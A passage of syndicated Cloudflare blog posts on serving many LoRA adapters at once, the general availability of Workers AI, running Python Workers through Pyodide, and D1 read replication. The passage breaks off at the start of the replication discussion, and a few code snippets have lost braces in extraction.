Serving multiple LoRA models simultaneously poses a challenge in terms of GPU resource utilization. While it is possible to batch inference requests to a base model, it is much more challenging to batch requests with the added complexity of serving unique LoRA adapters. To tackle this problem, we leverage the Punica CUDA kernel design in combination with global cache optimizations in order to handle the memory intensive workload of multi-tenant LoRA serving while offering low inference latency.

The Punica CUDA kernel was introduced in the paper Punica: Multi-Tenant LoRA Serving as a method to serve multiple, significantly different LoRA models applied to the same base model. In comparison to previous inference techniques, the method offers substantial throughput and latency improvements. This optimization is achieved in part through enabling request batching even across requests serving different LoRA adapters.

The core of the Punica kernel system is a new CUDA kernel called Segmented Gather Matrix-Vector Multiplication (SGMV). SGMV allows a GPU to store only a single copy of the pre-trained model while serving different LoRA models. The Punica kernel design system consolidates the batching of requests for unique LoRA models to improve performance by parallelizing the feature-weight multiplication of different requests in a batch. Requests for the same LoRA model are then grouped to increase operational intensity. Initially, the GPU loads the base model while reserving most of its GPU memory for KV Cache. The LoRA components (A and B matrices) are then loaded on demand from remote storage (Cloudflare’s cache or R2) when required by an incoming request. This on demand loading introduces only milliseconds of latency, which means that multiple LoRA adapters can be seamlessly fetched and served with minimal impact on inference performance. Frequently requested LoRA adapters are cached for the fastest possible inference.

Once a requested LoRA has been cached locally, the speed it can be made available for inference is constrained only by PCIe bandwidth. Regardless, given that each request may require its own LoRA, it becomes critical that LoRA downloads and memory copy operations are performed asynchronously. The Punica scheduler tackles this exact challenge, batching only requests which currently have required LoRA weights available in GPU memory, and queueing requests that do not until the required weights are available and the request can efficiently join a batch.

By effectively managing KV cache and batching these requests, it is possible to handle significant multi-tenant LoRA-serving workloads. A further and important optimization is the use of continuous batching. Common batching methods require all requests to the same adapter to reach their stopping condition before being released. Continuous batching allows a request in a batch to be released early so that it does not need to wait for the longest running request.

Given that LLMs deployed to Cloudflare’s network are available globally, it is important that LoRA adapter models are as well. Very soon, we will implement remote model files that are cached at Cloudflare’s edge to further reduce inference latency.

A roadmap for fine-tuning on Workers AI

Launching support for LoRA adapters is an important step towards unlocking fine-tunes on our platform. In addition to the LLM fine-tunes available today, we look forward to supporting more models and a variety of task types, including image generation.

Our vision for Workers AI is to be the best place for developers to run their AI workloads — and this includes the process of fine-tuning itself. Eventually, we want to be able to run the fine-tuning training job as well as fully fine-tuned models directly on Workers AI. This unlocks many use cases for AI to be more relevant in organizations by empowering models to have more granularity and detail for specific tasks.

With AI Gateway, we will be able to help developers log their prompts and responses, which they can then use to fine-tune models with production data. Our vision is to have a one-click fine-tuning service, where log data from AI Gateway can be used to retrain a model (on Cloudflare) and then the fine-tuned model can be redeployed on Workers AI for inference. This will allow developers to personalize their AI models to fit their applications, allowing for granularity as low as a per-user level. The fine-tuned model can then be smaller and more optimized, helping users save time and money on AI inference – and the magic is that all of this can all happen within our very own Developer Platform.

We’re excited for you to try the open beta for BYO LoRAs! Read our Developer Docs for more details, and tell us what you think on Discord.

Leveling up Workers AI: general availability and more new capabilities

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/workers-ai-ga-huggingface-loras-python-support

Welcome to Tuesday – our AI day of Developer Week 2024! In this blog post, we’re excited to share an overview of our new AI announcements and vision, including news about Workers AI officially going GA with improved pricing, a GPU hardware momentum update, an expansion of our Hugging Face partnership, Bring Your Own LoRA fine-tuned inference, Python support in Workers, more providers in AI Gateway, and Vectorize metadata filtering.

Workers AI GA

Today, we’re excited to announce that our Workers AI inference platform is now Generally Available. After months of being in open beta, we’ve improved our service with greater reliability and performance, unveiled pricing, and added many more models to our catalog.

Improved performance & reliability

With Workers AI, our goal is to make AI inference as reliable and easy to use as the rest of Cloudflare’s network. Under the hood, we’ve upgraded the load balancing that is built into Workers AI. Requests can now be routed to more GPUs in more cities, and each city is aware of the total available capacity for AI inference. If the request would have to wait in a queue in the current city, it can instead be routed to another location, getting results back to you faster when traffic is high. With this, we’ve increased rate limits across all our models – most LLMs now have a of 300 requests per minute, up from 50 requests per minute during our beta phase. Smaller models have a limit of 1500-3000 requests per minute. Check out our Developer Docs for the rate limits of individual models.

Lowering costs on popular models

Alongside our GA of Workers AI, we published a pricing calculator for our 10 non-beta models earlier this month. We want Workers AI to be one of the most affordable and accessible solutions to run inference, so we added a few optimizations to our models to make them more affordable. Now, Llama 2 is over 7x cheaper and Mistral 7B is over 14x cheaper to run than we had initially published on March 1. We want to continue to be the best platform for AI inference and will continue to roll out optimizations to our customers when we can.

As a reminder, our billing for Workers AI started on April 1st for our non-beta models, while beta models remain free and unlimited. We offer 10,000 neurons per day for free to all customers. Workers Free customers will encounter a hard rate limit after 10,000 neurons in 24 hours while Workers Paid customers will incur usage at $0.011 per 1000 additional neurons.  Read our Workers AI Pricing Developer Docs for the most up-to-date information on pricing.

New dashboard and playground

Lastly, we’ve revamped our Workers AI dashboard and AI playground. The Workers AI page in the Cloudflare dashboard now shows analytics for usage across models, including neuron calculations to help you better predict pricing. The AI playground lets you quickly test and compare different models and configure prompts and parameters. We hope these new tools help developers start building on Workers AI seamlessly – go try them out!

Run inference on GPUs in over 150 cities around the world

When we announced Workers AI back in September 2023, we set out to deploy GPUs to our data centers around the world. We plan to deliver on that promise and deploy inference-tuned GPUs almost everywhere by the end of 2024, making us the most widely distributed cloud-AI inference platform. We have over 150 cities with GPUs today and will continue to roll out more throughout the year.

We also have our next generation of compute servers with GPUs launching in Q2 2024, which means better performance, power efficiency, and improved reliability over previous generations. We provided a preview of our Gen 12 Compute servers design in a December 2023 blog post, with more details to come. With Gen 12 and future planned hardware launches, the next step is to support larger machine learning models and offer fine-tuning on our platform. This will allow us to achieve higher inference throughput, lower latency and greater availability for production workloads, as well as expanding support to new categories of workloads such as fine-tuning.

Hugging Face Partnership

We’re also excited to continue our partnership with Hugging Face in the spirit of bringing the best of open-source to our customers. Now, you can visit some of the most popular models on Hugging Face and easily click to run the model on Workers AI if it is available on our platform.

We’re happy to announce that we’ve added 4 more models to our platform in conjunction with Hugging Face. You can now access the new Mistral 7B v0.2 model with improved context windows, Nous Research’s Hermes 2 Pro fine-tuned version of Mistral 7B, Google’s Gemma 7B, and Starling-LM-7B-beta fine-tuned from OpenChat. There are currently 14 models that we’ve curated with Hugging Face to be available for serverless GPU inference powered by Cloudflare’s Workers AI platform, with more coming soon. These models are all served using Hugging Face’s technology with a TGI backend, and we work closely with the Hugging Face team to curate, optimize, and deploy these models.

“We are excited to work with Cloudflare to make AI more accessible to developers. Offering the most popular open models with a serverless API, powered by a global fleet of GPUs is an amazing proposition for the Hugging Face community, and I can’t wait to see what they build with it.”
Julien Chaumond, Co-founder and CTO, Hugging Face

You can find all of the open models supported in Workers AI in this Hugging Face Collection, and the “Deploy to Cloudflare Workers AI” button is at the top of each model card. To learn more, read Hugging Face’s blog post and take a look at our Developer Docs to get started. Have a model you want to see on Workers AI? Send us a message on Discord with your request.

Supporting fine-tuned inference – BYO LoRAs

Fine-tuned inference is one of our most requested features for Workers AI, and we’re one step closer now with Bring Your Own (BYO) LoRAs. Using the popular Low-Rank Adaptation method, researchers have figured out how to take a model and adapt some model parameters to the task at hand, rather than rewriting all model parameters like you would for a fully fine-tuned model. This means that you can get fine-tuned model outputs without the computational expense of fully fine-tuning a model.

We now support bringing trained LoRAs to Workers AI, where we apply the LoRA adapter to a base model at runtime to give you fine-tuned inference, at a fraction of the cost, size, and speed of a fully fine-tuned model. In the future, we want to be able to support fine-tuning jobs and fully fine-tuned models directly on our platform, but we’re excited to be one step closer today with LoRAs.

const response = await ai.run(
  "@cf/mistralai/mistral-7b-instruct-v0.2-lora", //the model supporting LoRAs
      messages: [{"role": "user", "content": "Hello world"],
      raw: true, //skip applying the default chat template
      lora: "00000000-0000-0000-0000-000000000", //the finetune id OR name 

BYO LoRAs is in open beta as of today for Gemma 2B and 7B, Llama 2 7B and Mistral 7B models with LoRA adapters up to 100MB in size and max rank of 8, and up to 30 total LoRAs per account. As always, we expect you to use Workers AI and our new BYO LoRA feature with our Terms of Service in mind, including any model-specific restrictions on use contained in the models’ license terms.

Read the technical deep dive blog post and developer docs to get started.

Write Workers in Python

Python is the second most popular programming language in the world (after JavaScript) and the language of choice for building AI applications. And starting today, in open beta, you can now write Cloudflare Workers in Python. Python Workers support all bindings to resources on Cloudflare, including Vectorize, D1, KV, R2 and more.

LangChain is the most popular framework for building LLM‑powered applications, and like how Workers AI works with langchain-js, the Python LangChain library works on Python Workers, as do other Python packages like FastAPI.

Workers written in Python are just as simple as Workers written in JavaScript:

from js import Response

async def on_fetch(request, env):
    return Response.new("Hello world!")

…and are configured by simply pointing at a .py file in your wrangler.toml:

name = "hello-world-python-worker"
main = "src/entry.py"
compatibility_date = "2024-03-18"
compatibility_flags = ["python_workers"]

There are no extra toolchain or precompilation steps needed. The Pyodide Python execution environment is provided for you, directly by the Workers runtime, mirroring how Workers written in JavaScript already work.

There’s lots more to dive into — take a look at the docs, and check out our companion blog post for details about how Python Workers work behind the scenes.

AI Gateway now supports Anthropic, Azure, AWS Bedrock, Google Vertex, and Perplexity

Our AI Gateway product helps developers better control and observe their AI applications, with analytics, caching, rate limiting, and more. We are continuing to add more providers to the product, including Anthropic, Google Vertex, and Perplexity, which we’re excited to announce today. We quietly rolled out Azure and Amazon Bedrock support in December 2023, which means that the most popular providers are now supported via AI Gateway, including Workers AI itself.

Take a look at our Developer Docs to get started with AI Gateway.

Coming soon: Persistent Logs

In Q2 of 2024, we will be adding persistent logs so that you can push your logs (including prompts and responses) to object storage, custom metadata so that you can tag requests with user IDs or other identifiers, and secrets management so that you can securely manage your application’s API keys.

We want AI Gateway to be the control plane for your AI applications, allowing developers to dynamically evaluate and route requests to different models and providers. With our persistent logs feature, we want to enable developers to use their logged data to fine-tune models in one click, eventually running the fine-tune job and the fine-tuned model directly on our Workers AI platform. AI Gateway is just one product in our AI toolkit, but we’re excited about the workflows and use cases it can unlock for developers building on our platform, and we hope you’re excited about it too.

Vectorize metadata filtering and future GA of million vector indexes

Vectorize is another component of our toolkit for AI applications. In open beta since September 2023, Vectorize allows developers to persist embeddings (vectors), like those generated from Workers AI text embedding models, and query for the closest match to support use cases like similarity search or recommendations. Without a vector database, model output is forgotten and can’t be recalled without extra costs to re-run a model.

Since Vectorize’s open beta, we’ve added metadata filtering. Metadata filtering lets developers combine vector search with filtering for arbitrary metadata, supporting the query complexity in AI applications. We’re laser-focused on getting Vectorize ready for general availability, with an target launch date of June 2024, which will include support for multi-million vector indexes.

// Insert vectors with metadata
const vectors: Array<VectorizeVector> = [
    id: "1",
    values: [32.4, 74.1, 3.2],
    metadata: { url: "/products/sku/13913913", streaming_platform: "netflix" }
    id: "2",
    values: [15.1, 19.2, 15.8],
    metadata: { url: "/products/sku/10148191", streaming_platform: "hbo" }
let upserted = await env.YOUR_INDEX.upsert(vectors);

// Query with metadata filtering
let metadataMatches = await env.YOUR_INDEX.query(<queryVector>, { filter: { streaming_platform: "netflix" }} )

The most comprehensive Developer Platform to build AI applications

On Cloudflare’s Developer Platform, we believe that all developers should be able to quickly build and ship full-stack applications  – and that includes AI experiences as well. With our GA of Workers AI, announcements for Python support in Workers, AI Gateway, and Vectorize, and our partnership with Hugging Face, we’ve expanded the world of possibilities for what you can build with AI on our platform. We hope you are as excited as we are – take a look at all our Developer Docs to get started, and let us know what you build.

Bringing Python to Workers using Pyodide and WebAssembly

Post Syndicated from Hood Chatham original https://blog.cloudflare.com/python-workers

Starting today, in open beta, you can now write Cloudflare Workers in Python.

This new support for Python is different from how Workers have historically supported languages beyond JavaScript — in this case, we have directly integrated a Python implementation into workerd, the open-source Workers runtime. All bindings, including bindings to Vectorize, Workers AI, R2, Durable Objects, and more are supported on day one. Python Workers can import a subset of popular Python packages including FastAPI, Langchain, Numpy and more. There are no extra build steps or external toolchains.

To do this, we’ve had to push the bounds of all of our systems, from the runtime itself, to our deployment system, to the contents of the Worker bundle that is published across our network. You can read the docs, and start using it today.

We want to use this post to pull back the curtain on the internal lifecycle of a Python Worker, share what we’ve learned in the process, and highlight where we’re going next.

Beyond “Just compile to WebAssembly”

Cloudflare Workers have supported WebAssembly since 2018 — each Worker is a V8 isolate, powered by the same JavaScript engine as the Chrome web browser. In principle, it’s been possible for years to write Workers in any language — including Python — so long as it first compiles to WebAssembly or to JavaScript.

In practice, just because something is possible doesn’t mean it’s simple. And just because “hello world” works doesn’t mean you can reliably build an application. Building full applications requires supporting an ecosystem of packages that developers are used to building with. For a platform to truly support a programming language, it’s necessary to go much further than showing how to compile code using external toolchains.

Python Workers are different from what we’ve done in the past. It’s early, and still in beta, but we think it shows what providing first-class support for programming languages beyond JavaScript can look like on Workers.

The lifecycle of a Python Worker

With Pyodide now built into workerd, you can write a Worker like this:

from js import Response

async def on_fetch(request, env):
    return Response.new("Hello world!")

…with a wrangler.toml file that points to a .py file:

name = "hello-world-python-worker"
main = "src/entry.py"
compatibility_date = "2024-03-18"

…and when you run npx wrangler@latest dev, the Workers runtime will:

  1. Determine which version of Pyodide is required, based on your compatibility date
  2. Create an isolate for your Worker, and automatically inject Pyodide
  3. Serve your Python code using Pyodide

This all happens under the hood — no extra toolchain or precompilation steps needed. The Python execution environment is provided for you, mirroring how Workers written in JavaScript already work.

A Python interpreter built into the Workers runtime

Just as JavaScript has many engines, Python has many implementations that can execute Python code. CPython is the reference implementation of Python. If you’ve used Python before, this is almost certainly what you’ve used, and is commonly referred to as just “Python”.

Pyodide is a port of CPython to WebAssembly. It interprets Python code, without any need to precompile the Python code itself to any other format. It runs in a web browser — check out this REPL. It is true to the CPython that Python developers know and expect, providing most of the Python Standard Library. It provides a foreign function interface (FFI) to JavaScript, allowing you to call JavaScript APIs directly from Python — more on this below. It provides popular open-source packages, and can import pure Python packages directly from PyPI.

Pyodide struck us as the perfect fit for Workers. It is designed to allow the core interpreter and each native Python module to be built as separate WebAssembly modules, dynamically linked at runtime. This allows the code footprint for these modules to be shared among all Workers running on the same machine, rather than requiring each Worker to bring its own copy. This is essential to making WebAssembly work well in the Workers environment, where we often run thousands of Workers per machine — we need Workers using the same programming language to share their runtime code footprint. Running thousands of Workers on every machine is what makes it possible for us to deploy every application in every location at a reasonable price.

Just like with JavaScript Workers, with Python Workers we provide the runtime for you:

Pyodide is currently the exception — most languages that target WebAssembly do not yet support dynamic linking, so each application ends up bringing its own copy of its language runtime. We hope to see more languages support dynamic linking in the future, so that we can more effectively bring them to Workers.

How Pyodide works

Pyodide executes Python code in WebAssembly, which is a sandboxed environment, separated from the host runtime. Unlike running native code, all operations outside of pure computation (such as file reads) must be provided by a runtime environment, then imported by the WebAssembly module.

LLVM provides three target triples for WebAssembly:

  1. wasm32-unknown-unknown – this backend provides no C standard library or system call interface; to support this backend, we would need to manually rewrite every system or library call to make use of imports we would define ourselves in the runtime.
  2. wasm32-wasi – WASI is a standardized system interface, and defines a standard set of imports that are implemented in WASI runtimes such as wasmtime.
  3. wasm32-unknown-emscripten – Like WASI, Emscripten defines the imports that a WebAssembly program needs to execute, but also outputs an accompanying JavaScript library that implements these imported functions.

Pyodide uses Emscripten, and provides three things:

  1. A distribution of the CPython interpreter, compiled using Emscripten
  2. A foreign function interface (FFI) between Python and JavaScript
  3. A set of third-party Python packages, compiled using Emscripten’s compiler to WebAssembly.

Of these targets, only Emscripten currently supports dynamic linking, which, as we noted above, is essential to providing a shared language runtime for Python that is shared across isolates. Emscripten does this by providing implementations of dlopen and dlsym, which use the accompanying JavaScript library to modify the WebAssembly program’s table to link additional WebAssembly-compiled modules at runtime. WASI does not yet support the dlopen/dlsym dynamic linking abstractions used by CPython.

Pyodide and the magic of foreign function interfaces (FFI)

You might have noticed that in our Hello World Python Worker, we import Response from the js module:

from js import Response

async def on_fetch(request, env):
    return Response.new("Hello world!")

Why is that?

Most Workers are written in JavaScript, and most of our engineering effort on the Workers runtime goes into improving JavaScript Workers. There is a risk in adding a second language that it might never reach feature parity with the first language and always be a second class citizen. Pyodide’s foreign function interface (FFI) is critical to avoiding this by providing access to all JavaScript functionality from Python. This can be used by the Worker author directly, and it is also used to make packages like FastAPI and Langchain work out-of-the-box, as we’ll show later in this post.

An FFI is a system for calling functions in one language that are implemented in another language. In most cases, an FFI is defined by a “higher-level” language in order to call functions implemented in a systems language, often C. Python’s ctypes module is such a system. These sorts of foreign function interfaces are often difficult to use because of the nature of C APIs.

Pyodide’s foreign function interface is an interface between Python and JavaScript, which are two high level object-oriented languages with a lot of design similarities. When passed from one language to another, immutable types such as strings and numbers are transparently translated. All mutable objects are wrapped in an appropriate proxy.

When a JavaScript object is passed into Python, Pyodide determines which JavaScript protocols the object supports and dynamically constructs an appropriate Python class that implements the corresponding Python protocols. For example, if the JavaScript object supports the JavaScript iteration protocol then the proxy will support the Python iteration protocol. If the JavaScript object is a Promise or other thenable, the Python object will be an awaitable.

from js import JSON

js_array = JSON.parse("[1,2,3]")

for entry in js_array:

The lifecycle of a request to a Python Worker makes use of Pyodide’s FFI, wrapping the incoming JavaScript Request object in a JsProxy object that is accessible in your Python code. It then converts the value returned by the Python Worker’s handler into a JavaScript Response object that can be delivered back to the client:

Why dynamic linking is essential, and static linking isn’t enough

Python comes with a C FFI, and many Python packages use this FFI to import native libraries. These libraries are typically written in C, so they must first be compiled down to WebAssembly in order to work on the Workers runtime. As we noted above, Pyodide is built with Emscripten, which overrides Python’s C FFI — any time a package tries to load a native library, it is instead loaded from a WebAssembly module that is provided by the Workers runtime. Dynamic linking is what makes this possible — it is what lets us override Python’s C FFI, allowing Pyodide to support many Python packages that have native library dependencies.

Dynamic linking is “pay as you go”, while static linking is “pay upfront” — if code is statically linked into your binary, it must be loaded upfront in order for the binary to run, even if this code is never used.

Dynamic linking enables the Workers runtime to share the underlying WebAssembly modules of packages across different Workers that are running on the same machine.

We won’t go too much into detail on how dynamic linking works in Emscripten, but the main takeaway is that the Emscripten runtime fetches WebAssembly modules from a filesystem abstraction provided in JavaScript. For each Worker, we generate a filesystem at runtime, whose structure mimics a Python distribution that has the Worker’s dependencies installed, but whose underlying files are shared between Workers. This makes it possible to share Python and WebAssembly files between multiple Workers that import the same dependency. Today, we’re able to share these files across Workers, but copy them into each new isolate. We think we can go even further, by employing copy-on-write techniques to share the underlying resource across many Workers.

Supporting Server and Client libraries

Python has a wide variety of popular HTTP client libraries, including httpx, urllib3, requests and more. Unfortunately, none of them work out of the box in Pyodide. Adding support for these has been one of the longest running user requests for the Pyodide project. The Python HTTP client libraries all work with raw sockets, and the browser security model and CORS do not allow this, so we needed another way to make them work in the Workers runtime.

Async Client libraries

For libraries that can make requests asynchronously, including aiohttp and httpx, we can use the Fetch API to make requests. We do this by patching the library, instructing it to use the Fetch API from JavaScript — taking advantage of Pyodide’s FFI. The httpx patch ends up quite simple —fewer than 100 lines of code. Simplified even further, it looks like this:

from js import Headers, Request, fetch

def py_request_to_js_request(py_request):
    js_headers = Headers.new(py_request.headers)
    return Request.new(py_request.url, method=py_request.method, headers=js_headers)

def js_response_to_py_response(js_response):
  ... # omitted

async def do_request(py_request):
  js_request = py_request_to_js_request(py_request)
    js_response = await fetch(js_request)
    py_response = js_response_to_py_response(js_response)
    return py_response

Synchronous Client libraries

Another challenge in supporting Python HTTP client libraries is that many Python APIs are synchronous. For these libraries, we cannot use the fetch API directly because it is asynchronous.

Thankfully, Joe Marshall recently landed a contribution to urllib3 that adds Pyodide support in web browsers by:

  1. Checking if blocking with Atomics.wait() is possible
    a. If so, start a fetch worker thread
    b. Delegate the fetch operation to the worker thread and serialize the response into a SharedArrayBuffer
    c. In the Python thread, use Atomics.wait to block for the response in the SharedArrayBuffer
  2. If Atomics.wait() doesn’t work, fall back to a synchronous XMLHttpRequest

Despite this, today Cloudflare Workers do not support worker threads or synchronous XMLHttpRequest, so neither of these two approaches will work in Python Workers. We do not support synchronous requests today, but there is a way forward…

WebAssembly Stack Switching

There is an approach which will allow us to support synchronous requests. WebAssembly has a stage 3 proposal adding support for stack switching, which v8 has an implementation of. Pyodide contributors have been working on adding support for stack switching to Pyodide since September of 2022, and it is almost ready.

With this support, Pyodide exposes a function called run_sync which can block for completion of an awaitable:

from pyodide.ffi import run_sync

def sync_fetch(py_request):
   js_request = py_request_to_js_request(py_request)
   js_response  = run_sync(fetch(js_request))
   return js_response_to_py_response(js_response)

FastAPI and Python’s Asynchronous Server Gateway Interface

FastAPI is one of the most popular libraries for defining Python servers. FastAPI applications use a protocol called the Asynchronous Server Gateway Interface (ASGI). This means that FastAPI never reads from or writes to a socket itself. An ASGI application expects to be hooked up to an ASGI server, typically uvicorn. The ASGI server handles all of the raw sockets on the application’s behalf.

Conveniently for us, this means that FastAPI works in Cloudflare Workers without any patches or changes to FastAPI itself. We simply need to replace uvicorn with an appropriate ASGI server that can run within a Worker. Our initial implementation lives here, in the fork of Pyodide that we maintain. We hope to add a more comprehensive feature set, add test coverage, and then upstream this implementation into Pyodide.

You can try this yourself by cloning cloudflare/python-workers-examples, and running npx wrangler@latest dev in the directory of the FastAPI example.

Importing Python Packages

Python Workers support a subset of Python packages, which are provided directly by Pyodide, including numpy, httpx, FastAPI, Langchain, and more. This ensures compatibility with the Pyodide runtime by pinning package versions to Pyodide versions, and allows Pyodide to patch internal implementations, as we showed above in the case of httpx.

To import a package, simply add it to your requirements.txt file, without adding a version number. A specific version of the package is provided directly by Pyodide. Today, you can use packages in local development, and in the coming weeks, you will be able to deploy Workers that define dependencies in a requirements.txt file. Later in this post, we’ll show how we’re thinking about managing new versions of Pyodide and packages.

We maintain our own fork of Pyodide, which allows us to provide patches specific to the Workers runtime, and to quickly expand our support for packages in Python Workers, while also committing to upstreaming our changes back to Pyodide, so that the whole ecosystem of developers can benefit.

Python packages are often big and memory hungry though, and they can do a lot of work at import time. How can we ensure that you can bring in the packages you need, while mitigating long cold start times?

Making cold starts faster with memory snapshots

In the example at the start of this post, in local development, we mentioned injecting Pyodide into your Worker. Pyodide itself is 6.4MB — and Python packages can also be quite large.

If we simply shoved Pyodide into your Worker and uploaded it to Cloudflare, that’d be quite a large Worker to load into a new isolate — cold starts would be slow. On a fast computer with a good network connection, Pyodide takes about two seconds to initialize in a web browser, one second of network time and one second of cpu time. It wouldn’t be acceptable to initialize it every time you update your code for every isolate your Worker runs in across Cloudflare’s network.

Instead, when you run npx wrangler@latest deploy, the following happens:

  1. Wrangler uploads your Python code and your requirements.txt file to the Workers API
  2. We send your Python code, and your requirements.txt file to the Workers runtime to be validated
  3. We create a new isolate for your Worker, and automatically inject Pyodide plus any packages you’ve specified in your requirements.txt file.
  4. We scan the Worker’s code for import statements, execute them, and then take a snapshot of the Worker’s WebAssembly linear memory. Effectively, we perform the expensive work of importing packages at deploy time, rather than at runtime.
  5. We deploy this snapshot alongside your Worker’s Python code to Cloudflare’s network.
  6. Just like a JavaScript Worker, we execute the Worker’s top-level scope.

When a request comes in to your Worker, we load this snapshot and use it to bootstrap your Worker in an isolate, avoiding expensive initialization time:

This takes cold starts for a basic Python Worker down to below 1 second. We’re not yet satisfied with this though. We’re confident that we can drive this down much, much further. How? By reusing memory snapshots.

Reusing Memory Snapshots

When you upload a Python Worker, we generate a single memory snapshot of the Worker’s top-level imports, including both Pyodide and any dependencies. This snapshot is specific to your Worker. It can’t be shared, even though most of its contents are the same as other Python Workers.

Instead, we can create a single, shared snapshot ahead of time, and preload it into a pool of “pre-warmed” isolates. These isolates would already have the Pyodide runtime loaded and ready — making a Python Worker work just like a JavaScript Worker. In both cases, the underlying interpreter and execution environment is provided by the Workers runtime, and available on-demand without delay. The only difference is that with Python, the interpreter runs in WebAssembly, within the Worker.

Snapshots are a common pattern across runtimes and execution environments. Node.js uses V8 snapshots to speed up startup time. You can take snapshots of Firecracker microVMs and resume execution in a different process. There’s lots more we can do here — not just for Python Workers, but for Workers written in JavaScript as well, caching snapshots of compiled code from top-level scope and the state of the isolate itself. Workers are so fast and efficient that to-date we haven’t had to take snapshots in this way, but we think there are still big performance gains to be had.

This is our biggest lever towards driving cold start times down over the rest of 2024.

Future proofing compatibility with Pyodide versions and Compatibility Dates

When you deploy a Worker to Cloudflare, you expect it to keep running indefinitely, even if you never update it again. There are Workers deployed in 2018 that are still running just fine in production.

We achieve this using Compatibility Dates and Compatibility Flags, which provide explicit opt-in mechanisms for new behavior and potentially backwards-incompatible changes, without impacting existing Workers.

This works in part because it mirrors how the Internet and web browsers work. You publish a web page with some JavaScript, and rightly expect it to work forever. Web browsers and Cloudflare Workers have the same type of commitment of stability to developers.

There is a challenge with Python though — both Pyodide and CPython are versioned. Updated versions are published regularly and can contain breaking changes. And Pyodide provides a set of built-in packages, each with a pinned version number. This presents a question — how should we allow you to update your Worker to a newer version of Pyodide?

The answer is Compatibility Dates and Compatibility Flags.

A new version of Python is released every year in August, and a new version of Pyodide is released six (6) months later. When this new version of Pyodide is published, we will add it to Workers by gating it behind a Compatibility Flag, which is only enabled after a specified Compatibility Date. This lets us continually provide updates, without risk of breaking changes, extending the commitment we’ve made for JavaScript to Python.

Each Python release has a five (5) year support window. Once this support window has passed for a given version of Python, security patches are no longer applied, making this version unsafe to rely on. To mitigate this risk, while still trying to hold as true as possible to our commitment of stability and long-term support, after five years any Python Worker still on a Python release that is outside of the support window will be automatically moved forward to the next oldest Python release. Python is a mature and stable language, so we expect that in most cases, your Python Worker will continue running without issue. But we recommend updating the compatibility date of your Worker regularly, to stay within the support window.

In between Python releases, we also expect to update and add additional Python packages, using the same opt-in mechanism. A Compatibility Flag will be a combination of the Python version and the release date of a set of packages. For example, python_3.17_packages_2025_03_01.

How bindings work in Python Workers

We mentioned earlier that Pyodide provides a foreign function interface (FFI) to JavaScript — meaning that you can directly use JavaScript objects, methods, functions and more, directly from Python.

This means that from day one, all binding APIs to other Cloudflare resources are supported in Cloudflare Workers. The env object that is provided by handlers in Python Workers is a JavaScript object that Pyodide provides a proxy API to, handling type translations across languages automatically.

For example, to write to and read from a KV namespace from a Python Worker, you would write:

from js import Response

async def on_fetch(request, env):
    await env.FOO.put("bar", "baz")
    bar = await env.FOO.get("bar")
    return Response.new(bar) # returns "baz"

This works for Web APIs too — see how Response is imported from the js module? You can import any global from JavaScript this way.

Get this JavaScript out of my Python!

You’re probably reading this post because you want to write Python instead of JavaScript. from js import Response just isn’t Pythonic. We know — and we have actually tackled this challenge before for another language (Rust). And we think we can do this even better for Python.

We launched workers-rs in 2021 to make it possible to write Workers in Rust. For each JavaScript API in Workers, we, alongside open-source contributors, have written bindings that expose a more idiomatic Rust API.

We plan to do the same for Python Workers — starting with the bindings to Workers AI and Vectorize. But while workers-rs requires that you use and update an external dependency, the APIs we provide with Python Workers will be built into the Workers runtime directly. Just update your compatibility date, and get the latest, most Pythonic APIs.

This is about more than just making bindings to resources on Cloudflare more Pythonic though — it’s about compatibility with the ecosystem.

Similar to how we recently converted workers-rs to use types from the http crate, which makes it easy to use the axum crate for routing, we aim to do the same for Python Workers. For example, the Python standard library provides a raw socket API, which many Python packages depend on. Workers already provides connect(), a JavaScript API for working with raw sockets. We see ways to provide at least a subset of the Python standard library’s socket API in Workers, enabling a broader set of Python packages to work on Workers, with less of a need for patches.

But ultimately, we hope to kick start an effort to create a standardized serverless API for Python. One that is easy to use for any Python developer and offers the same capabilities as JavaScript.

We’re just getting started with Python Workers

Providing true support for a new programming language is a big investment that goes far beyond making “hello world” work. We chose Python very intentionally — it’s the second most popular programming language after JavaScript — and we are committed to continuing to improve performance and widen our support for Python packages.

We’re grateful to the Pyodide maintainers and the broader Python community — and we’d love to hear from you. Drop into the Python Workers channel in the Cloudflare Developers Discord, or start a discussion on Github about what you’d like to see next and which Python packages you’d like us to support.

Building D1: a Global Database

Post Syndicated from Vy Ton original https://blog.cloudflare.com/building-d1-a-global-database

Developers who build Worker applications focus on what they’re creating, not the infrastructure required, and benefit from the global reach of Cloudflare’s network. Many applications require persistent data, from personal projects to business-critical workloads. Workers offer various database and storage options tailored to developer needs, such as key-value and object storage.

Relational databases are the backbone of many applications today. D1, Cloudflare’s relational database complement, is now generally available. Our journey from alpha in late 2022 to GA in April 2024 focused on enabling developers to build production workloads with the familiarity of relational data and SQL.

What’s D1?

D1 is Cloudflare’s built-in, serverless relational database. For Worker applications, D1 offers SQL’s expressiveness, leveraging SQLite’s SQL dialect, and developer tooling integrations, including object-relational mappers (ORMs) like Drizzle ORM. D1 is accessible via Workers or an HTTP API.

Serverless means no provisioning, default disaster recovery with Time Travel, and usage-based pricing. D1 includes a generous free tier that allows developers to experiment with D1 and then graduate those trials to production.

How to make data global?

D1 GA has focused on reliability and developer experience. Now, we plan on extending D1 to better support globally-distributed applications.

In the Workers model, an incoming request invokes serverless execution in the closest data center. A Worker application can scale globally with user requests. Application data, however, remains stored in centralized databases, and global user traffic must account for access round trips to data locations. For example, a D1 database today resides in a single location.

Workers support Smart Placement to account for frequently accessed data locality. Smart Placement invokes a Worker closer to centralized backend services like databases to lower latency and improve application performance. We’ve addressed Workers placement in global applications, but need to solve data placement.

The question, then, is how can D1, as Cloudflare’s built-in database solution, better support data placement for global applications? The answer is asynchronous read replication.

What is asynchronous read replication?

In a server-based database management system, like Postgres, MySQL, SQL Server, or Oracle, a read replica is a separate database server that serves as a read-only, almost up-to-date copy of the primary database server. An administrator creates a read replica by starting a new server from a snapshot of the primary server and configuring the primary server to send updates asynchronously to the replica server. Since the updates are asynchronous, the read replica may be behind the current state of the primary server. The difference between the primary server and a replica is called replica lag. It’s possible to have more than one read replica.

Asynchronous read replication is a time-proven solution for improving the performance of databases:

  • It’s possible to increase throughput by distributing load across multiple replicas.
  • It’s possible to lower query latency when the replicas are close to the users making queries.

Note that some database systems also offer synchronous replication. In a synchronous replicated system, writes must wait until all replicas have confirmed the write. Synchronous replicated systems can run only as fast as the slowest replica and come to a halt when a replica fails. If we’re trying to improve performance on a global scale, we want to avoid synchronous replication as much as possible!

Consistency models & read replicas

